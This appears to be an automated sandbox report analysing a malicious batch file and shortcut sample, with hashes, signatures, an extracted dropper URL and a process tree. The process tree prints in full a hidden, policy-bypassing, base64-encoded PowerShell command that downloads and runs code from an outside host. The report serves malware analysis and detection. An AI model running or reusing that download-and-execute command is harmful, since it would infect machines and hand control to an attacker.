Analysis
-
max time kernel
45s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
20-09-2022 17:54
Static task
static1
Behavioral task
behavioral1
Sample
Document.lnk
Resource
win7-20220812-en
windows7-x64
1 signatures
150 seconds
Behavioral task
behavioral2
Sample
Document.lnk
Resource
win10v2004-20220812-en
windows10-2004-x64
1 signatures
150 seconds
Behavioral task
behavioral3
Sample
ted/excimer.bat
Resource
win7-20220901-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral4
Sample
ted/excimer.bat
Resource
win10v2004-20220812-en
windows10-2004-x64
3 signatures
150 seconds
General
-
Target
ted/excimer.bat
-
Size
1KB
-
MD5
ca2f2dbe229b11a5d19532a095517786
-
SHA1
117f789e962dfff480309a766e84fce9dd9ab528
-
SHA256
c4762afcd5bfc15315081453004ab88bd0dbaafa74ca58b4f6f8fb920e1c8a8c
-
SHA512
42dab7cf697ba6d40a4d75531e723064f6144703c0227c4d34b2eed000a9a5ba5e4a1342e2617a78ce51b9e370475a29601c522509acb626ad510bb5b21d84dd
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://meeronixt.com/gate
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2012 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2012 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1048 wrote to memory of 2012 1048 cmd.exe 28 PID 1048 wrote to memory of 2012 1048 cmd.exe 28 PID 1048 wrote to memory of 2012 1048 cmd.exe 28
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ted\excimer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBlAGUAcgBvAG4AaQB4AHQALgBjAG8AbQAvAGcAYQB0AGUAIgApAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-